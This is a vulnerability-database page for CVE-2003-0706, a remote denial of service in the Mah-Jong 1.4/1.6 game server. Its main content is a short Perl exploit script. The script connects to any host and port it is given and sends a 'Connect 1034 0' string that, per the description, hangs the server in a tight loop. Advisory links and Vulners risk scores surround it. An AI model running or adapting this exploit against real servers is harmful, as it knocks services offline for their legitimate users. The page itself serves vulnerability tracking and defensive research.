Mah-Jong 1.4/1.6 - Server Remote Denial of Service
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CAN-2003-0706 | 6 Aug 202410:26 | – | cve | |
| CVE-2003-0706 | 12 Sep 200304:00 | – | cve | |
| CVE-2003-0706 | 12 Sep 200304:00 | – | cvelist | |
| CVE-2003-0706 | 12 Sep 200304:00 | – | debiancve | |
| Debian DSA-378-1 : mah-jong - buffer overflows, denial of service | 29 Sep 200400:00 | – | nessus | |
| EUVD-2003-0697 | 7 Oct 202500:30 | – | euvd | |
| CVE-2003-0706 | 17 Sep 200304:00 | – | nvd | |
| Debian Security Advisory DSA 378-1 (mah-jong) | 17 Jan 200800:00 | – | openvas | |
| Debian Security Advisory DSA 378-1 (mah-jong) | 17 Jan 200800:00 | – | openvas | |
| DEBIAN-CVE-2003-0706 | 17 Sep 200304:00 | – | osv |
10
source: https://www.securityfocus.com/bid/8558/info
A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users.
#!/usr/bin/perl -s
use IO::Socket;
# test it in slackware 9.0
# DOS-test--mj1.6--code by jsk
# mahJong 1.6, all versions of mahjong
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./dosmj.pl <host> <port>\n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$jsk ="Connect 1034 0";
$socket = new IO::Socket::INET (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "Connect 1034 0";
print $socket "\r\n";
close($socket);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.034